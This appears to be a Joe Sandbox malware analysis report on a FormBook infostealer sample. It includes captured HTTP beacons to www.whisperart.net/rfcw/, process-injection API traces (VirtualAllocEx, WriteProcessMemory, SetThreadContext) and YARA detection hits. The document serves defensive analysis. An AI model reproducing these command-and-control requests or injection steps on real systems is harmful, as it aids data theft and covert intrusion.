                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_kqSLNzJZVOH4WFcT/ZwTLP3TlHG4NSirpD7WLqxUz3ZK6Nrk1ru5Mh+ps3rhT6SPxcsCOMT6NFkH5d1MLOZz3g==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Jan 11, 2025 05:12:20.814074039 CET | 575 | IN
                                                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiM2ViMTFhZGMtMmE0YS00ODk4LWE5MDYtOTBjNGE1NGQ3MjI2IiwicGFnZV90aW1lIjoxNzM2NTY4Nz


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.7 | 50011 | 199.59.243.228 | 80 | 360 | C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 05:12:22.927083969 CET | 1744 | OUT | POST /rfcw/ HTTP/1.1
                                                                Host: www.whisperart.net
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                Origin: http://www.whisperart.net
                                                                Content-Length: 1251
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Cache-Control: no-cache
                                                                Connection: close
                                                                Referer: http://www.whisperart.net/rfcw/
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
Data Ascii: -Jkp4f= [TRUNCATED]
Jan 11, 2025 05:12:23.362076998 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                date: Sat, 11 Jan 2025 04:12:22 GMT
                                                                content-type: text/html; charset=utf-8
                                                                content-length: 1122
                                                                x-request-id: 4450ebdd-dde1-4e00-9a2b-6739861512e1
                                                                cache-control: no-store, max-age=0
                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                vary: sec-ch-prefers-color-scheme
                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_kqSLNzJZVOH4WFcT/ZwTLP3TlHG4NSirpD7WLqxUz3ZK6Nrk1ru5Mh+ps3rhT6SPxcsCOMT6NFkH5d1MLOZz3g==
                                                                set-cookie: parking_session=4450ebdd-dde1-4e00-9a2b-6739861512e1; expires=Sat, 11 Jan 2025 04:27:23 GMT; path=/
                                                                connection: close
                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_kqSLNzJZVOH4WFcT/ZwTLP3TlHG4NSirpD7WLqxUz3ZK6Nrk1ru5Mh+ps3rhT6SPxcsCOMT6NFkH5d1MLOZz3g==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Jan 11, 2025 05:12:23.362152100 CET | 575 | IN
                                                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNDQ1MGViZGQtZGRlMS00ZTAwLTlhMmItNjczOTg2MTUxMmUxIiwicGFnZV90aW1lIjoxNzM2NTY4Nz


Session ID | Source IP | Source Port | Destination IP | Destination Port
36 | 192.168.2.7 | 50013 | 199.59.243.228 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 05:12:26.472980976 CET | 451 | OUT | GET /rfcw/?-Jkp4f=1DVwkKEghiueIfFcCwDsNrzmsV0jlWV9KBxp6ijGOBnNtam7Kh7d0pIUvfGZjxRQl5JhLEpebxocieWLqaLg78l2CxgzVsRmsJfD+Nxr9z3yLKNaYWJKA3Al29U6v4dT7qNW9rMO1nzu&SVjx=u6ApldVh4TiTWl HTTP/1.1
                                                                Host: www.whisperart.net
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                Accept-Language: en-US,en;q=0.9
                                                                Connection: close
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
Jan 11, 2025 05:12:26.927902937 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                date: Sat, 11 Jan 2025 04:12:26 GMT
                                                                content-type: text/html; charset=utf-8
                                                                content-length: 1526
                                                                x-request-id: 338100e0-f7cc-4388-8782-966fe1c5b482
                                                                cache-control: no-store, max-age=0
                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                vary: sec-ch-prefers-color-scheme
                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Zd8B2zOIEkOEGWKjg0TlkB86SjzV7G57/Z0sSDiWBVduOmBda9Nxut0HKYcBQ6NfTQtvdKS4nx1nZAIeldiFkw==
                                                                set-cookie: parking_session=338100e0-f7cc-4388-8782-966fe1c5b482; expires=Sat, 11 Jan 2025 04:27:26 GMT; path=/
                                                                connection: close
                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Zd8B2zOIEkOEGWKjg0TlkB86SjzV7G57/Z0sSDiWBVduOmBda9Nxut0HKYcBQ6NfTQtvdKS4nx1nZAIeldiFkw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Jan 11, 2025 05:12:26.927956104 CET | 979 | IN
                                                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMzM4MTAwZTAtZjdjYy00Mzg4LTg3ODItOTY2ZmUxYzViNDgyIiwicGFnZV90aW1lIjoxNzM2NTY4Nz


                                                                Target ID:0
                                                                Start time:23:09:19
                                                                Start date:10/01/2025
                                                                Path:C:\Users\user\Desktop\ZcshRk2lgh.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\ZcshRk2lgh.exe"
                                                                Imagebase:0x890000
                                                                File size:834'048 bytes
                                                                MD5 hash:8C6E69B99C8595BEF72154984C028ADE
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:11
                                                                Start time:23:09:39
                                                                Start date:10/01/2025
                                                                Path:C:\Users\user\Desktop\ZcshRk2lgh.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\ZcshRk2lgh.exe"
                                                                Imagebase:0x950000
                                                                File size:834'048 bytes
                                                                MD5 hash:8C6E69B99C8595BEF72154984C028ADE
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.1631865087.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.1633443827.0000000001410000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.1634959361.00000000036C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:12
                                                                Start time:00:29:38
                                                                Start date:11/01/2025
                                                                Path:C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe"
                                                                Imagebase:0xa10000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3095243481.0000000004DA0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                Reputation:high
                                                                Has exited:false

                                                                Target ID:13
                                                                Start time:00:29:40
                                                                Start date:11/01/2025
                                                                Path:C:\Windows\SysWOW64\regini.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\SysWOW64\regini.exe"
                                                                Imagebase:0xe20000
                                                                File size:41'472 bytes
                                                                MD5 hash:C99C3BB423097FCF4990539FC1ED60E3
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.3092740310.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.3092128109.0000000000910000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.3092558737.0000000000DC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:moderate
                                                                Has exited:false

                                                                Target ID:14
                                                                Start time:00:29:54
                                                                Start date:11/01/2025
                                                                Path:C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe"
                                                                Imagebase:0xa10000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.3098541538.0000000005390000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                Reputation:high
                                                                Has exited:false

                                                                Target ID:16
                                                                Start time:00:30:06
                                                                Start date:11/01/2025
                                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                Imagebase:0x7ff722870000
                                                                File size:676'768 bytes
                                                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                  Execution Graph

                                                                  Execution Coverage:9.8%
                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                  Signature Coverage:6.6%
                                                                  Total number of Nodes:229
                                                                  Total number of Limit Nodes:21
36525 7661154 36524->36525 36525->36520 36527 7661154 36526->36527 36527->36520

                                                                  Control-flow Graph

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1451271228.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7190000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Hq$Hq$Hq$Hq$Hq
                                                                  • API String ID: 0-3799487529
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1451271228.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7190000_ZcshRk2lgh.jbxd
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1451956524.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7660000_ZcshRk2lgh.jbxd
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1451271228.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7190000_ZcshRk2lgh.jbxd
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1451208286.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7180000_ZcshRk2lgh.jbxd
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1451208286.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7180000_ZcshRk2lgh.jbxd

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32 ref: 02A5D3BE
                                                                  • GetCurrentThread.KERNEL32 ref: 02A5D3FB
                                                                  • GetCurrentProcess.KERNEL32 ref: 02A5D438
                                                                  • GetCurrentThreadId.KERNEL32 ref: 02A5D491
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1447061842.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2a50000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID: Current$ProcessThread
                                                                  • String ID:
                                                                  • API String ID: 2063062207-0

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32 ref: 02A5D3BE
                                                                  • GetCurrentThread.KERNEL32 ref: 02A5D3FB
                                                                  • GetCurrentProcess.KERNEL32 ref: 02A5D438
                                                                  • GetCurrentThreadId.KERNEL32 ref: 02A5D491
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1447061842.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2a50000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID: Current$ProcessThread
                                                                  • String ID:
                                                                  • API String ID: 2063062207-0

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0718EAB6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1451208286.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7180000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID: CreateProcess
                                                                  • String ID:
                                                                  • API String ID: 963392458-0

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 02A5B2FE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1447061842.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2a50000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule
                                                                  • String ID:
                                                                  • API String ID: 4139908857-0

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • CreateActCtxA.KERNEL32(?), ref: 02A559A9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1447061842.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2a50000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID: Create
                                                                  • String ID:
                                                                  • API String ID: 2289755597-0

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • CreateActCtxA.KERNEL32(?), ref: 02A559A9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1447061842.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2a50000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID: Create
                                                                  • String ID:
                                                                  • API String ID: 2289755597-0

                                                                  Control-flow Graph (figure not preserved; legend: Executed / Not Executed; the graphed code region contains a call to CreateIconFromResourceEx)
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1451271228.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7190000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFromIconResource
                                                                  • String ID:
                                                                  • API String ID: 3668623891-0

                                                                  Control-flow Graph (figure not preserved; legend: Executed / Not Executed; the graphed code region contains a call to DrawTextExW)
                                                                  APIs
                                                                  • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,0719C995,?,?), ref: 0719CA47
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1451271228.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7190000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID: DrawText
                                                                  • String ID:
                                                                  • API String ID: 2175133113-0
                                                                  APIs
                                                                  • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,0719C995,?,?), ref: 0719CA47
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1451271228.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7190000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID: DrawText
                                                                  • String ID:
                                                                  • API String ID: 2175133113-0
                                                                  APIs
                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0718E688
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1451208286.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7180000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryProcessWrite
                                                                  • String ID:
                                                                  • API String ID: 3559483778-0
                                                                  APIs
                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0718E768
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1451208286.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7180000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryProcessRead
                                                                  • String ID:
                                                                  • API String ID: 1726664587-0
                                                                  APIs
                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0718E0A6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1451208286.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7180000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID: ContextThreadWow64
                                                                  • String ID:
                                                                  • API String ID: 983334009-0
                                                                  APIs
                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02A5D60F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1447061842.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2a50000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID: DuplicateHandle
                                                                  • String ID:
                                                                  • API String ID: 3793708945-0
                                                                  APIs
                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02A5D60F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1447061842.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2a50000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID: DuplicateHandle
                                                                  • String ID:
                                                                  • API String ID: 3793708945-0
                                                                  APIs
                                                                  • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,07193482,?,?,?,?,?), ref: 07193527
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1451271228.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7190000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFromIconResource
                                                                  • String ID:
                                                                  • API String ID: 3668623891-0
                                                                  APIs
                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0718E5A6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1451208286.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7180000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1451208286.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7180000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID: ResumeThread
                                                                  • String ID:
                                                                  • API String ID: 947044025-0
                                                                  APIs
                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 02A5B2FE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1447061842.0000000002A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2a50000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule
                                                                  • String ID:
                                                                  • API String ID: 4139908857-0
                                                                  APIs
                                                                  • PostMessageW.USER32(?,?,?,?), ref: 07661145
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1451956524.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7660000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID: MessagePost
                                                                  • String ID:
                                                                  • API String ID: 410705778-0
                                                                  APIs
                                                                  • PostMessageW.USER32(?,?,?,?), ref: 07661145
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1451956524.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7660000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID: MessagePost
                                                                  • String ID:
                                                                  • API String ID: 410705778-0
                                                                  APIs
                                                                  • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,071954C9,?,?), ref: 07195A78
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1451271228.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7190000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandle
                                                                  • String ID:
                                                                  • API String ID: 2962429428-0
                                                                  APIs
                                                                  • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,071954C9,?,?), ref: 07195A78
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1451271228.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7190000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandle
                                                                  • String ID:
                                                                  • API String ID: 2962429428-0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1446763022.00000000013DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013DD000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_13dd000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1446763022.00000000013DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013DD000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_13dd000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1446848876.0000000002A0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A0D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2a0d000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1446848876.0000000002A0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A0D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2a0d000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 679543d2d3286b075b5894a6f310b1a7e08a0700f89d249d77ad3f11efcb184c
                                                                  • Instruction ID: b6c3c57547bf8b77926a23946321f56afdf9c461c6767800ee787af2124549bc
                                                                  • Opcode Fuzzy Hash: 679543d2d3286b075b5894a6f310b1a7e08a0700f89d249d77ad3f11efcb184c
                                                                  • Instruction Fuzzy Hash: 1221D072604600EFDB14DF64E9C4F26BB65FB84314F20C56DE80E4B296CB36D847CA62
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1446848876.0000000002A0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A0D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2a0d000_ZcshRk2lgh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 671ca0b4b53ebf7dba68ca2fc1ce0bf32f86619c05342f8540e3ff34678d7dde
                                                                  • Instruction ID: 2c78b9b1879975e52cedca8bea2262d40bd541110e10e6d66b6cacf66b962c9f
                                                                  • Opcode Fuzzy Hash: 671ca0b4b53ebf7dba68ca2fc1ce0bf32f86619c05342f8540e3ff34678d7dde
                                                                  • Instruction Fuzzy Hash: 4A219F765097809FCB16CF20E9D4B15BF71EB46314F28C5DAD8498B6A7C33A940ACB62
                                                                  Memory Dump Source
